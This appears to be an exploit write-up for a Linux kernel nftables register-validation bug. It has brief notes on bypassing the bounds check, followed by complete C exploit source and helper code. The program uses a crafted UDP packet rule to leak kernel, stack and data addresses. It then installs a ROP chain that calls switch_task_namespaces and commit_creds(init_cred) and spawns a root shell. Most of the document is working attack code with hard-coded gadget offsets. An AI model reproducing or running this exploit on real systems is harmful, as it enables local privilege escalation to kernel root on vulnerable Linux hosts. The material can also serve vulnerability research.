static unsigned int nft_parse_register(const struct nlattr *attr)

{

unsigned int reg;

reg = ntohl(nla_get_be32(attr));

switch (reg) {

case NFT_REG_VERDICT...NFT_REG_4:

return reg * NFT_REG_SIZE / NFT_REG32_SIZE;

default:

return reg + NFT_REG_SIZE / NFT_REG32_SIZE - NFT_REG32_00;

}

}

On the default branch the value goes in with 4 subtracted (reg + 4 - 8).

static int nft_validate_register_load(enum nft_registers reg, unsigned int len)

{

if (reg < NFT_REG_1 * NFT_REG_SIZE / NFT_REG32_SIZE)

return -EINVAL;

if (len == 0)

return -EINVAL;

if (reg * NFT_REG32_SIZE + len > sizeof_field(struct nft_regs, data))

return -ERANGE;

return 0;

}



>>> print(hex(((0xffffff00+0xe8)* 4 + (0x70))&0xffffffff))

The check is bypassed like this. Keep in mind that 4 is subtracted on the way in and that the index is multiplied by 4; with both accounted for, a leak is possible.

0xffffffff82000195 <__do_softirq+405> jne __do_softirq+650 <__do_softirq+650>

0xffffffff8200019b <__do_softirq+411> mov edx, dword ptr [rbp - 0x44]

0xffffffff8200019e <__do_softirq+414> mov rax, qword ptr gs:[0x1fbc0]

I checked where __do_softirq exits normally. Something is loaded at this point, which told me this is the part that restores the key value.

So I found the normal value at rbp-0x44 and put that value in.

Near the end there is a spot that returns into the softirq path, so after the ROP chain has run, execution can leave through it.

pwndbg> x/40xi 0xffffffff810bd765

0xffffffff810bd765 <do_softirq+117>: pop rsp

0xffffffff810bd766 <do_softirq+118>: mov BYTE PTR gs:[rip+0x7ef62416],0x0 # 0x1fb84 <hardirq_stack_inuse>

0xffffffff810bd76e <do_softirq+126>: and bh,0x2

0xffffffff810bd771 <do_softirq+129>: je 0xffffffff810bd72c <do_softirq+60>

0xffffffff810bd773 <do_softirq+131>: sti

0xffffffff810bd774 <do_softirq+132>: nop WORD PTR [rax+rax*1+0x0]

0xffffffff810bd77a <do_softirq+138>: mov rbx,QWORD PTR [rbp-0x8]

0xffffffff810bd77e <do_softirq+142>: leave

0xffffffff810bd77f <do_softirq+143>: ret

0xffffffff810bd780 <do_softirq+144>: call 0xffffffff810df6

It returns through pop rsp; if rbp is set up to match as well, execution returns normally.

*(uint64_t *)(udpbuf+i*8) = cur_stack + 0x3f88; i++;

*(uint64_t *)(udpbuf+i*8) = kernel_base + cliret; i++;

*(uint64_t *)(udpbuf+i*8) = kernel_base + prbp;i++;

*(uint64_t *)(udpbuf+i*8) = cur_stack+0x3f60;i++;

*(uint64_t *)(udpbuf+i*8)= kernel_base + 0x100016d;i++;

*(uint64_t *)(udpbuf+i*8) = 0x40010000000000;i++;

*(uint64_t *)(udpbuf+i*8)= 0x40010000000000;i++;

*(uint64_t *)(udpbuf+i*8) = 0x40010000000000;i++;

*(uint64_t *)(udpbuf+i*8) = 0x40010000000000;i++;

*(uint64_t *)(udpbuf+i*8) = 0x40010000000000;i++;

*(uint64_t *)(udpbuf+i*8) = 0x40010000000000;i++;

*(uint64_t *)(udpbuf+i*8) = 0x400100;i++;

*(uint64_t *)(udpbuf+i*8) = 0x400100;i++;

*(uint64_t *)(udpbuf+i*8) = 0x400100;i++;

*(uint64_t *)(udpbuf+i*8) = cur_stack+0x3f58;i++; //sfp

*(uint64_t *)(udpbuf+i*8) = cur_stack+0x3f58;i++; //r15

*(uint64_t *)(udpbuf+i*8) = kernel_base + bpf_get_current_task;i++;

*(uint64_t *)(udpbuf+i*8) = kernel_base + movrdirax;i++;

*(uint64_t *)(udpbuf+i*8) = kernel_base + prsi;i++;

*(uint64_t *)(udpbuf+i*8) = data_base + data_init_nsproxy;i++;

*(uint64_t *)(udpbuf+i*8) = kernel_base + switch_task_namespace;i++;

*(uint64_t *)(udpbuf+i*8) = kernel_base + prdi;i++;

*(uint64_t *)(udpbuf+i*8) = data_base + data_init_cred;i++;

*(uint64_t *)(udpbuf+i*8) = kernel_base + commit_creds;i++;

*(uint64_t *)(udpbuf+i*8) = kernel_base + ret;i++;

*(uint64_t *)(udpbuf+i*8) = kernel_base + ret;i++;

*(uint64_t *)(udpbuf+i*8) = kernel_base + ret;i++;

*(uint64_t *)(udpbuf+i*8) = kernel_base + ret;i++;

*(uint64_t *)(udpbuf+i*8) = kernel_base + ret;i++;

*(uint64_t *)(udpbuf+i*8) = kernel_base + ret;i++;

*(uint64_t *)(udpbuf+i*8) = kernel_base + go;i++;

With a chain like this, cli is called up front and most of the tail of __do_softirq is cut off, which makes things easier. After the privilege escalation, execution leaves through do_softirq.



Exploit code

#define _GNU_SOURCE

#include <stdlib.h>

#include <time.h>

#include <string.h>

#include <unistd.h>

#include <stddef.h>

#include "utils.h"

#define prdi 0xa4f20

#define prsi 0xfd61e

#define prdx 0x66a40

#define pushrax 0x463d5

#define ret 0x1fc

#define prbp 0x802

#define stiret 0x65e115 // dec ecx

#define cliret 0x5ec83a

#define bpf_get_current_task 0x217de0

#define movrdirax 0x625d74 // 0xffffffff81625d74 : mov rdi, rax ; jne 0xffffffff81625d61 ; xor eax, eax ; ret

#define data_init_nsproxy 0x202060

#define switch_task_namespace 0xe5c80

#define data_init_cred 0x2022a0

#define commit_creds 0xe74a0

#define go 0x22c92 // add rsp, 0x10 ; pop r12 ; pop r13 ; pop rbp ; ret

static struct nftnl_rule *isolate_udp_pkt(uint8_t family, const char *table, const char *chain, const char * target_chain)

{

struct nftnl_rule *r = NULL;

uint16_t port = 8888;

r = nftnl_rule_alloc();

if (r == NULL) {

perror("OOM");

exit(EXIT_FAILURE);

}

nftnl_rule_set_str(r, NFTNL_RULE_TABLE, table);

nftnl_rule_set_str(r, NFTNL_RULE_CHAIN, chain);

nftnl_rule_set_u32(r, NFTNL_RULE_FAMILY, family);

// meta load l4proto => reg 1

add_meta(r, NFT_META_L4PROTO, NFT_REG_1);

uint8_t v = 17;

add_cmp(r,NFT_REG_1 ,NFT_CMP_EQ,&v,sizeof(v));

add_payload(r, NFT_PAYLOAD_TRANSPORT_HEADER, 0,NFT_REG32_01, 2, 2);

uint16_t dport = htons(port);

add_cmp(r,NFT_REG32_01, NFT_CMP_EQ , &dport, sizeof(dport));

add_verdict(r, NFT_JUMP, target_chain, NFT_REG_VERDICT);

// TODO

return r;

}

static struct nftnl_rule *edit_udp_data(uint8_t family, const char *table, const char *chain)

{

struct nftnl_rule *r = NULL;

r = nftnl_rule_alloc();

if (r == NULL) {

perror("OOM");

exit(EXIT_FAILURE);

}

// enum nft_payload_bases {

// NFT_PAYLOAD_LL_HEADER,

// NFT_PAYLOAD_NETWORK_HEADER,

// NFT_PAYLOAD_TRANSPORT_HEADER,

// };

nftnl_rule_set_str(r, NFTNL_RULE_TABLE, table);

nftnl_rule_set_str(r, NFTNL_RULE_CHAIN, chain);

nftnl_rule_set_u32(r, NFTNL_RULE_FAMILY, family);

int off = 0xfc;

add_payload(r,NFT_PAYLOAD_TRANSPORT_HEADER,0xffffff00+off,0x0,0x8,0x70);

// TODO

return r;

}

static struct nftnl_rule *rop(uint8_t family, const char *table, const char *chain)

{

struct nftnl_rule *r = NULL;

r = nftnl_rule_alloc();

if (r == NULL) {

perror("OOM");

exit(EXIT_FAILURE);

}

nftnl_rule_set_str(r, NFTNL_RULE_TABLE, table);

nftnl_rule_set_str(r, NFTNL_RULE_CHAIN, chain);

nftnl_rule_set_u32(r, NFTNL_RULE_FAMILY, family);

int off = 0xd4;

add_payload(r,NFT_PAYLOAD_TRANSPORT_HEADER,0x0,0xffffff00+off+4,0x8,0xff);

// add_payload(r,NFT_PAYLOAD_TRANSPORT_HEADER,0x0,1,0x8,0x8);

// TODO

return r;

}

void install_rule_for_leak()

{

if(create_rule(isolate_udp_pkt(NFPROTO_IPV4, "filter", "input", "leak")) == 0 ){

perror("error creating rule");

exit(EXIT_FAILURE);

}

if(create_rule(edit_udp_data(NFPROTO_IPV4, "filter", "leak")) == 0 ){

perror("error creating rule");

exit(EXIT_FAILURE);

}

}

void install_rule_for_rop(){

if(create_rule(isolate_udp_pkt(NFPROTO_IPV4, "filter", "input2", "rop")) == 0 ){

perror("error creating rule");

exit(EXIT_FAILURE);

}

if(create_rule(rop(NFPROTO_IPV4, "filter", "rop")) == 0 ){

perror("error creating rule");

exit(EXIT_FAILURE);

}

}

void udp_client(void * data){

int sockfd;

struct sockaddr_in server_addr;

char * buf = malloc(0x200);

sockfd = socket(AF_INET, SOCK_DGRAM, 0);

if (sockfd == -1) {

perror("socket");

exit(EXIT_FAILURE);

}

server_addr.sin_family = AF_INET;

server_addr.sin_port = htons(8888);

inet_pton(AF_INET, "127.0.0.1", &(server_addr.sin_addr));

if (connect(sockfd, (struct sockaddr *)&server_addr, sizeof((server_addr))) == -1) {

perror("connect");

close(sockfd);

exit(EXIT_FAILURE);

}

int res = write(sockfd, data, 0x200);

close(sockfd);

return 0;

}

void udp_server(void * buf){

struct sockaddr_in server_addr;

socklen_t server_addr_len;

struct sockaddr_in client_addr;

socklen_t client_addr_len;

char tmp[0x200];

client_addr_len = sizeof( client_addr);

int fd = socket(AF_INET, SOCK_DGRAM, 0);

server_addr.sin_family = AF_INET;

server_addr.sin_port = htons(8888);

server_addr.sin_addr.s_addr=htonl(INADDR_ANY );

if (bind(fd, (struct sockaddr *)&server_addr, sizeof(server_addr)) == -1) {

perror("bind");

close(fd);

exit(EXIT_FAILURE);

}

recvfrom(fd, buf, 0x200,0,&client_addr,client_addr_len);

recvfrom(fd, tmp, 0x200,0,&client_addr,client_addr_len);

return 0;

}

int main(int argc, char *argv[])

{

int tid, status;

pthread_t p_thread;

unsigned char udpbuf[512] = {0,};

uint64_t kernel_base = 0;

memset(udpbuf, 0x41, 512);

new_ns();

system("ip link set lo up");

printf("[+] Leak kernel base address\n");

printf(" [-] install udp server\n");

uint64_t * buf = malloc(0x200);

tid = pthread_create(&p_thread, NULL, udp_server, buf);

if (tid < 0){

perror("thread create error : ");

exit(0);

}

printf(" [-] setup nftables\n");

if(create_table(NFPROTO_IPV4, "filter", false) == 0){

perror("error creating table");

exit(EXIT_FAILURE);

}

if(create_chain("filter", "input", NF_INET_LOCAL_IN) == 0){

perror("error creating chain");

exit(EXIT_FAILURE);

}

if(create_chain("filter", "leak", 0) == 0){

perror("error creating chain");

exit(EXIT_FAILURE);

}

install_rule_for_leak();

printf(" [-] send & recv udp packet\n");

usleep(1000);

udp_client(udpbuf);

sleep(1);

hexdump(buf,0x200);

uint64_t data_base = buf[0] - 0x17e0d8;

uint64_t cur_stack = buf[5] - 0x3fe8;

kernel_base = buf[6] - 0x10000d9;

printf(" [-] kernel base address 0x%lx\n", kernel_base);

printf(" [-] leaked 0x%lx\n", cur_stack);

printf(" [-] leaked 0x%lx\n", data_base);

delete_chain("filter","input");

delete_chain("filter","leak");

puts("[+] Ropping");

if(create_chain("filter", "rop", 0) == 0){

perror("error creating chain");

exit(EXIT_FAILURE);

}

if(create_chain("filter", "input2", NF_INET_LOCAL_IN) == 0){

perror("error creating chain");

exit(EXIT_FAILURE);

}

install_rule_for_rop();

puts(" [-] install rop chain");

memset(udpbuf, 0x41, 512);

int i = 0;

*(uint64_t *)(udpbuf+i*8) = cur_stack + 0x3f88; i++;

*(uint64_t *)(udpbuf+i*8) = kernel_base + cliret; i++;

*(uint64_t *)(udpbuf+i*8) = kernel_base + prbp;i++;

*(uint64_t *)(udpbuf+i*8) = cur_stack+0x3f60;i++;

*(uint64_t *)(udpbuf+i*8)= kernel_base + 0x100016d;i++;

*(uint64_t *)(udpbuf+i*8) = 0x40010000000000;i++;

*(uint64_t *)(udpbuf+i*8)= 0x40010000000000;i++;

*(uint64_t *)(udpbuf+i*8) = 0x40010000000000;i++;

*(uint64_t *)(udpbuf+i*8) = 0x40010000000000;i++;

*(uint64_t *)(udpbuf+i*8) = 0x40010000000000;i++;

*(uint64_t *)(udpbuf+i*8) = 0x40010000000000;i++;

*(uint64_t *)(udpbuf+i*8) = 0x400100;i++;

*(uint64_t *)(udpbuf+i*8) = 0x400100;i++;

*(uint64_t *)(udpbuf+i*8) = 0x400100;i++;

*(uint64_t *)(udpbuf+i*8) = cur_stack+0x3f58;i++; //sfp

*(uint64_t *)(udpbuf+i*8) = cur_stack+0x3f58;i++; //r15

*(uint64_t *)(udpbuf+i*8) = kernel_base + bpf_get_current_task;i++;

*(uint64_t *)(udpbuf+i*8) = kernel_base + movrdirax;i++;

*(uint64_t *)(udpbuf+i*8) = kernel_base + prsi;i++;

*(uint64_t *)(udpbuf+i*8) = data_base + data_init_nsproxy;i++;

*(uint64_t *)(udpbuf+i*8) = kernel_base + switch_task_namespace;i++;

*(uint64_t *)(udpbuf+i*8) = kernel_base + prdi;i++;

*(uint64_t *)(udpbuf+i*8) = data_base + data_init_cred;i++;

*(uint64_t *)(udpbuf+i*8) = kernel_base + commit_creds;i++;

*(uint64_t *)(udpbuf+i*8) = kernel_base + ret;i++;

*(uint64_t *)(udpbuf+i*8) = kernel_base + ret;i++;

*(uint64_t *)(udpbuf+i*8) = kernel_base + ret;i++;

*(uint64_t *)(udpbuf+i*8) = kernel_base + ret;i++;

*(uint64_t *)(udpbuf+i*8) = kernel_base + ret;i++;

*(uint64_t *)(udpbuf+i*8) = kernel_base + ret;i++;

*(uint64_t *)(udpbuf+i*8) = kernel_base + go;i++;

puts(" [-] install udp client");

udp_client(udpbuf);

pthread_join(p_thread, (void **)&status);

puts(" [-] Spawning sh");

system("/bin/sh");

return 0;

}

// 306

// rbp-0x40 = 0xffffc6ca

// >

// cli ret

// 0xffffffff8200016d - 0x100016d WAKEUP

#include <netinet/in.h>

#include <netinet/ip.h>

#include <netinet/tcp.h>

#include <arpa/inet.h>

#include <sys/types.h>

#include <sys/socket.h>

#include <errno.h>

#include <pthread.h>

#include <fcntl.h>

#include <sched.h>

#include <sys/ioctl.h>

#include <ctype.h>

#include <linux/netfilter.h>

#include <linux/netfilter/nfnetlink.h>

#include <linux/netfilter/nf_tables.h>

#include <libmnl/libmnl.h>

#include <libnftnl/rule.h>

#include <libnftnl/expr.h>

#include <libnftnl/table.h>

#include <libnftnl/chain.h>

void pin_cpu(int cpu)

{

cpu_set_t set;

CPU_ZERO(&set);

CPU_SET(cpu, &set);

if (sched_setaffinity(0, sizeof(cpu_set_t), &set)) {

perror("sched_setaffinity");

exit(-1);

}

}

bool create_table(uint32_t protocol, char * table_name, bool delete){

struct mnl_socket *nl;

char buf[MNL_SOCKET_BUFFER_SIZE];

struct nlmsghdr *nlh;

uint32_t portid, seq, table_seq;

struct nftnl_table *t;

struct mnl_nlmsg_batch *batch;

int ret, batching;

t = nftnl_table_alloc();

if (t == NULL) {

perror("nftnl_table_alloc");

return false;

}

nftnl_table_set_u32(t, NFTNL_TABLE_FAMILY, protocol);

nftnl_table_set_str(t, NFTNL_TABLE_NAME, table_name);

batching = nftnl_batch_is_supported();

if (batching < 0) {

perror("cannot talk to nfnetlink");

return false;

}

seq = time(NULL);

batch = mnl_nlmsg_batch_start(buf, sizeof(buf));

if (batching) {

nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);

mnl_nlmsg_batch_next(batch);

}

table_seq = seq;

nlh = nftnl_table_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch),

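/* the netlink family is hardcoded to NFPROTO_IPV4 here, regardless of the protocol argument */

delete ? NFT_MSG_DELTABLE : NFT_MSG_NEWTABLE, NFPROTO_IPV4,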

NLM_F_ACK, seq++);

nftnl_table_nlmsg_build_payload(nlh, t);

nftnl_table_free(t);

mnl_nlmsg_batch_next(batch);

if (batching) {

nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);

mnl_nlmsg_batch_next(batch);

}

nl = mnl_socket_open(NETLINK_NETFILTER);

if (nl == NULL) {

perror("mnl_socket_open");

return false;

}

if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) {

perror("mnl_socket_bind");

return false;

}

portid = mnl_socket_get_portid(nl);

if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch),

mnl_nlmsg_batch_size(batch)) < 0) {

perror("mnl_socket_send");

return false;

}

mnl_nlmsg_batch_stop(batch);

ret = mnl_socket_recvfrom(nl, buf, sizeof(buf));

while (ret > 0) {

ret = mnl_cb_run(buf, ret, table_seq, portid, NULL, NULL);

if (ret <= 0)

break;

ret = mnl_socket_recvfrom(nl, buf, sizeof(buf));

}

if (ret == -1) {

perror("create_table: netlink reply");

mnl_socket_close(nl); /* do not leak the socket on the error path */

return false;

}

mnl_socket_close(nl);

return true;

}

bool create_chain(char * table_name, char * chain_name, uint32_t hook_num){ // NF_INET_LOCAL_IN

struct mnl_socket *nl;

char buf[MNL_SOCKET_BUFFER_SIZE];

struct nlmsghdr *nlh;

uint32_t portid, seq, chain_seq;

int ret;

struct nftnl_chain *t;

struct mnl_nlmsg_batch *batch;

int batching;

t = nftnl_chain_alloc();

if (t == NULL)

return false;

nftnl_chain_set_str(t, NFTNL_CHAIN_TABLE, table_name);

nftnl_chain_set_str(t, NFTNL_CHAIN_NAME, chain_name);

if(hook_num != 0)

nftnl_chain_set_u32(t, NFTNL_CHAIN_HOOKNUM, hook_num);

nftnl_chain_set_u32(t, NFTNL_CHAIN_PRIO, 0);

batching = nftnl_batch_is_supported();

if (batching < 0) {

perror("cannot talk to nfnetlink");

return false;

}

seq = time(NULL);

batch = mnl_nlmsg_batch_start(buf, sizeof(buf));

if (batching) {

nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);

mnl_nlmsg_batch_next(batch);

}

chain_seq = seq;

nlh = nftnl_chain_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch),

NFT_MSG_NEWCHAIN, NFPROTO_IPV4,

NLM_F_ACK, seq++);

nftnl_chain_nlmsg_build_payload(nlh, t);

nftnl_chain_free(t);

mnl_nlmsg_batch_next(batch);

if (batching) {

nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);

mnl_nlmsg_batch_next(batch);

}

nl = mnl_socket_open(NETLINK_NETFILTER);

if (nl == NULL) {

perror("mnl_socket_open");

return false;

}

if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) {

perror("mnl_socket_bind");

return false;

}

portid = mnl_socket_get_portid(nl);

if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch),

mnl_nlmsg_batch_size(batch)) < 0) {

perror("mnl_socket_send");

return false;

}

mnl_nlmsg_batch_stop(batch); /* release the batch, as the other helpers do */

ret = mnl_socket_recvfrom(nl, buf, sizeof(buf));

while (ret > 0) {

ret = mnl_cb_run(buf, ret, chain_seq, portid, NULL, NULL);

if (ret <= 0)

break;

ret = mnl_socket_recvfrom(nl, buf, sizeof(buf));

}

if (ret == -1) {

perror("create_chain: netlink reply");

mnl_socket_close(nl); /* do not leak the socket on the error path */

return false;

}

mnl_socket_close(nl);

return true;

}

bool delete_chain(char * table_name, char * chain_name){

struct mnl_socket *nl;

char buf[MNL_SOCKET_BUFFER_SIZE];

struct nlmsghdr *nlh;

uint32_t portid, seq, chain_seq;

int ret;

struct nftnl_chain *t;

struct mnl_nlmsg_batch *batch;

int batching;

t = nftnl_chain_alloc();

if (t == NULL)

return false;

nftnl_chain_set_str(t, NFTNL_CHAIN_TABLE, table_name);

nftnl_chain_set_str(t, NFTNL_CHAIN_NAME, chain_name);

seq = time(NULL);

batch = mnl_nlmsg_batch_start(buf, sizeof(buf));

nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);

mnl_nlmsg_batch_next(batch);

chain_seq = seq;

nlh = nftnl_chain_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch),

NFT_MSG_DELCHAIN, NFPROTO_IPV4,

NLM_F_ACK, seq++);

nftnl_chain_nlmsg_build_payload(nlh, t);

nftnl_chain_free(t);

mnl_nlmsg_batch_next(batch);

nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);

mnl_nlmsg_batch_next(batch);

nl = mnl_socket_open(NETLINK_NETFILTER);

if (nl == NULL) {

perror("mnl_socket_open");

return false;

}

if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) {

perror("mnl_socket_bind");

return false;

}

portid = mnl_socket_get_portid(nl);

if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch),

mnl_nlmsg_batch_size(batch)) < 0) {

perror("mnl_socket_send");

return false;

}

mnl_nlmsg_batch_stop(batch);

ret = mnl_socket_recvfrom(nl, buf, sizeof(buf));

while (ret > 0) {

ret = mnl_cb_run(buf, ret, chain_seq, portid, NULL, NULL);

if (ret <= 0)

break;

ret = mnl_socket_recvfrom(nl, buf, sizeof(buf));

}

if (ret == -1) {

perror("delete_chain: netlink reply");

mnl_socket_close(nl); /* do not leak the socket on the error path */

return false;

}

mnl_socket_close(nl);

return true;

}

bool create_rule(struct nftnl_rule * r)

{

struct mnl_socket *nl;

struct nlmsghdr *nlh;

struct mnl_nlmsg_batch *batch;

char buf[MNL_SOCKET_BUFFER_SIZE];

uint32_t seq = time(NULL);

int ret;

nl = mnl_socket_open(NETLINK_NETFILTER);

if (nl == NULL) {

perror("mnl_socket_open");

return false;

}

if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) {

perror("mnl_socket_bind");

return false;

}

batch = mnl_nlmsg_batch_start(buf, sizeof(buf));

nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);

mnl_nlmsg_batch_next(batch);

nlh = nftnl_rule_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch),

NFT_MSG_NEWRULE,

nftnl_rule_get_u32(r, NFTNL_RULE_FAMILY),

NLM_F_APPEND|NLM_F_CREATE|NLM_F_ACK, seq++);

nftnl_rule_nlmsg_build_payload(nlh, r);

nftnl_rule_free(r); /* create_rule() takes ownership: the caller must not reuse r */

mnl_nlmsg_batch_next(batch);

nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);

mnl_nlmsg_batch_next(batch);

ret = mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch),

mnl_nlmsg_batch_size(batch));

if (ret == -1) {

perror("mnl_socket_sendto");

return false;

}

mnl_nlmsg_batch_stop(batch);

ret = mnl_socket_recvfrom(nl, buf, sizeof(buf));

if (ret == -1) {

perror("mnl_socket_recvfrom");

return false;

}

ret = mnl_cb_run(buf, ret, 0, mnl_socket_get_portid(nl), NULL, NULL);

if (ret < 0) {

perror("mnl_cb_run");

return false;

}

mnl_socket_close(nl);

return true;

}

static void add_meta(struct nftnl_rule *r, uint32_t key, uint32_t dreg)

{

struct nftnl_expr *e;

e = nftnl_expr_alloc("meta");

if (e == NULL) {

perror("expr meta oom");

exit(EXIT_FAILURE);

}

nftnl_expr_set_u32(e, NFTNL_EXPR_META_KEY, key);

nftnl_expr_set_u32(e, NFTNL_EXPR_META_DREG, dreg);

nftnl_rule_add_expr(r, e);

}

static void add_cmp(struct nftnl_rule *r, uint32_t sreg, uint32_t op,

const void *data, uint32_t data_len)

{

struct nftnl_expr *e;

e = nftnl_expr_alloc("cmp");

if (e == NULL) {

perror("expr cmp oom");

exit(EXIT_FAILURE);

}

nftnl_expr_set_u32(e, NFTNL_EXPR_CMP_SREG, sreg);

nftnl_expr_set_u32(e, NFTNL_EXPR_CMP_OP, op);

nftnl_expr_set(e, NFTNL_EXPR_CMP_DATA, data, data_len);

nftnl_rule_add_expr(r, e);

}

static void add_payload(struct nftnl_rule *r, uint32_t base, uint32_t sreg, uint32_t dreg, uint32_t offset, uint32_t len)

{

struct nftnl_expr *e;

e = nftnl_expr_alloc("payload");

if (e == NULL) {

perror("expr payload oom");

exit(EXIT_FAILURE);

}

nftnl_expr_set_u32(e, NFTNL_EXPR_PAYLOAD_BASE, base);

if(sreg != 0)

nftnl_expr_set_u32(e, NFTNL_EXPR_PAYLOAD_SREG, sreg);

if(dreg != 0)

nftnl_expr_set_u32(e, NFTNL_EXPR_PAYLOAD_DREG, dreg);

nftnl_expr_set_u32(e, NFTNL_EXPR_PAYLOAD_OFFSET, offset);

nftnl_expr_set_u32(e, NFTNL_EXPR_PAYLOAD_LEN, len);

nftnl_rule_add_expr(r, e);

}

int add_verdict(struct nftnl_rule *r, int verdict, char * chain, uint32_t dreg)

{

struct nftnl_expr *e;

e = nftnl_expr_alloc("immediate");

if (e == NULL) {

perror("expr immediate oom");

exit(EXIT_FAILURE);

}

nftnl_expr_set_u32(e, NFTNL_EXPR_IMM_DREG, dreg);

nftnl_expr_set_u32(e, NFTNL_EXPR_IMM_VERDICT, verdict);

if(chain)

nftnl_expr_set_str(e, NFTNL_EXPR_IMM_CHAIN, chain);

nftnl_rule_add_expr(r, e);

return 0;

}

void write_file(const char *filename, char *text) {

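/* These /proc files are only written, so O_WRONLY is enough. */

int fd = open(filename, O_WRONLY);

if (fd < 0) {

perror(filename);

return;

}

if (write(fd, text, strlen(text)) < 0)

perror(filename);

close(fd);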

}

void new_ns(void) {

uid_t uid = getuid();

gid_t gid = getgid();

char buffer[0x100];

if (unshare(CLONE_NEWUSER | CLONE_NEWNS)) {

perror(" [-] unshare(CLONE_NEWUSER | CLONE_NEWNS)");

exit(EXIT_FAILURE);

}

if (unshare(CLONE_NEWNET)){

perror(" [-] unshare(CLONE_NEWNET)");

exit(EXIT_FAILURE);

}

write_file("/proc/self/setgroups", "deny");

snprintf(buffer, sizeof(buffer), "0 %d 1", uid);

write_file("/proc/self/uid_map", buffer);

snprintf(buffer, sizeof(buffer), "0 %d 1", gid);

write_file("/proc/self/gid_map", buffer);

}

#ifndef HEXDUMP_COLS

#define HEXDUMP_COLS 16

#endif

void hexdump(void *mem, unsigned int len)

{

unsigned int i, j;

for(i = 0; i < len + ((len % HEXDUMP_COLS) ? (HEXDUMP_COLS - len % HEXDUMP_COLS) : 0); i++)

{

/* print offset */

if(i % HEXDUMP_COLS == 0)

{

printf("0x%06x: ", i);

}

/* print hex data */

if(i < len)

{

printf("%02x ", 0xFF & ((char*)mem)[i]);

}

else /* end of block, just aligning for ASCII dump */

{

printf("   "); /* three spaces, same width as one "%02x " cell */

}

/* print ASCII dump */

if(i % HEXDUMP_COLS == (HEXDUMP_COLS - 1))

{

for(j = i - (HEXDUMP_COLS - 1); j <= i; j++)

{

if(j >= len) /* end of block, not really printing */

{

putchar(' ');

}

else if(isprint(((unsigned char*)mem)[j])) /* printable char; cast avoids passing a negative value to isprint() */

{

putchar(0xFF & ((char*)mem)[j]);

}

else /* other char */

{

putchar('.');

}

}

putchar('\n');

}

}

}